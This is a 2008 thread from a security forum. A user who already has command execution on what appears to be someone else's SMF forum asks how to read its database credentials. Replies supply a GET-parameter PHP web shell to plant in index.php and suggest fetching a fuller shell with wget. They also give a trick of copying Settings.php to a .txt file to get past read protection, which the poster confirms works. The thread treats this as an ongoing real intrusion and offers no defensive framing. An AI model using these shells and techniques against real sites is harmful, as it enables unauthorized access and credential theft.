Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: April 19, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 423 Members: 0 Total: 423 PacketStorm News ·301 Moved Permanently read more... IT Security and Insecurity Portal www.waraxe.us Forum Index -> Shell commands injection -> Php-Injection: Can't find config files Goto page 1, 2  Next    View previous topic :: View next topic  Php-Injection: Can't find config files Posted: Tue Dec 09, 2008 7:11 pm -AO- Advanced user   Joined: Jul 15, 2008 Posts: 205 Location: United States I've got a shell with system()... The site has smf forum and normally there is a configuration file called Settings.php that has db user and pass, I found this by dll the source. So you would think this: Code: <? @system("ls /blah/blah/forum/"); ?> It's there...so <? @system("cat /blah/blah/forum/Settings.php"); ?> but this file is showing up empty... So I don't understand where the db connection is made. I also tried this: Code: <? @system("find / -name '*.conf*'"); ?> and <? @system("find / -name '*Settings*'"); ?> No success of finding db connection Any ideas? Posted: Tue Dec 09, 2008 7:33 pm capt Advanced user   Joined: Nov 04, 2008 Posts: 232 prolly its chmod permissions or system() commands are disabled for that user. Try a better code use this... btw im guessing ur editing the code in the index.php file from the admin theme manager. Code: <?php if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;} ?> using this... ex. http://somesite.com/index.php?lol=command (like wget,cat,ls -la,etc) Posted: Tue Dec 09, 2008 7:56 pm pexli Valuable expert   Joined: May 24, 2007 Posts: 665 Location: Bulgaria Look in the source of login.php. Posted: Tue Dec 09, 2008 8:47 pm -AO- Advanced user   Joined: Jul 15, 2008 Posts: 205 Location: United States @capt I'm not having a problem with system() function. My code is working fine but thanks for the reply. @Pexli Thanks, I will try login.php Posted: Tue Dec 09, 2008 10:55 pm capt Advanced user   Joined: Nov 04, 2008 Posts: 232 have u tried wgeting a php shell then? Be easier to read and have much more control over what you wanna do. Posted: Tue Dec 09, 2008 11:30 pm -AO- Advanced user   Joined: Jul 15, 2008 Posts: 205 Location: United States I'm not able to check to see if login.php will work because the creditials for the login isn't on this pc. I did upload a b64 shell and it crashed the forum and was put back up later in the day. Not sure why this happened but I don't want it to happen again http://thedefaced.org/shells/b64.txt Posted: Tue Dec 09, 2008 11:59 pm capt Advanced user   Joined: Nov 04, 2008 Posts: 232 do you have msn? I could help you upload a working shell and you can get what you want. add me if you would like sir_boxhead@hotmail.com Posted: Wed Dec 10, 2008 5:04 am -AO- Advanced user   Joined: Jul 15, 2008 Posts: 205 Location: United States @Pexli This looks to be useful in LogInOut.php Code: $context['default_username'] = &$_REQUEST['u']; $context['default_password'] = ''; I see it in the source of SMF but not in the one on the server Where is this db connection made? Posted: Wed Dec 10, 2008 5:57 am pexli Valuable expert   Joined: May 24, 2007 Posts: 665 Location: Bulgaria Try to read files like that <? @readfile(/bla/bla/bla/file.php'); ?> Posted: Wed Dec 10, 2008 6:28 am -AO- Advanced user   Joined: Jul 15, 2008 Posts: 205 Location: United States @Pexli Thanks for reply. I'm getting the same output with readfile() as cat in system() This is the code at the top of the page: Code: '\'' . $user_settings['passwordSalt'] . '\'')); setLoginCookie($timeout - time(), $ID_MEMBER, sha1($user_settings['passwd'] So this part of the source seems to be missing or deleted? Code:            $context['page_title'] = $txt[34];    $context['default_username'] = &$_REQUEST['u'];    $context['default_password'] = '';    $context['never_expire'] = false; Posted: Wed Dec 10, 2008 10:49 am pexli Valuable expert   Joined: May 24, 2007 Posts: 665 Location: Bulgaria How about listing of all files and dir's? Posted: Thu Dec 11, 2008 1:49 am -AO- Advanced user   Joined: Jul 15, 2008 Posts: 205 Location: United States I did this with, "ls -lR" and I see everything in blah/blah/blah/forum/. This is what you mean? Posted: Thu Dec 11, 2008 8:43 am pexli Valuable expert   Joined: May 24, 2007 Posts: 665 Location: Bulgaria -AO- wrote: I did this with, "ls -lR" and I see everything in blah/blah/blah/forum/. This is what you mean? cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt ...and read settings via browser http://forum.com/forum/somefile.txt Posted: Thu Dec 11, 2008 10:11 am -AO- Advanced user   Joined: Jul 15, 2008 Posts: 205 Location: United States Code: cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt This worked, I can read the copied Settings.php file. Must have been some protection from reading it. Thanks a lot pexli Posted: Thu Dec 11, 2008 11:19 am pexli Valuable expert   Joined: May 24, 2007 Posts: 665 Location: Bulgaria -AO- wrote: Code: cp /bla/bla/bla/forum/Settings.php /bla/bla/bla/forum/somefile.txt This worked, I can read the copied Settings.php file. Must have been some protection from reading it. Thanks a lot pexli Good luck dude. Php-Injection: Can't find config files   www.waraxe.us Forum Index -> Shell commands injection You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT   Page 1 of 2   Goto page 1, 2  Next All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  Select a forum Security Research by waraxe----------------General discussionHow to fixMetasploit related Hash cracking requests----------------MD5 hashesAll other hashesHash related information http://www.waraxe.us portal----------------SuggestionsCooperation proposals Security bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holes Various software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo Gallery Programming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssembler Reverse engineering----------------Newbies cornerDisassemblingPHP script decode requests Miscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy database Direct Downloads----------------ToolsTutorialsWordlists Recycle Bin----------------Removed messagesOutdated posts   Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.174 Seconds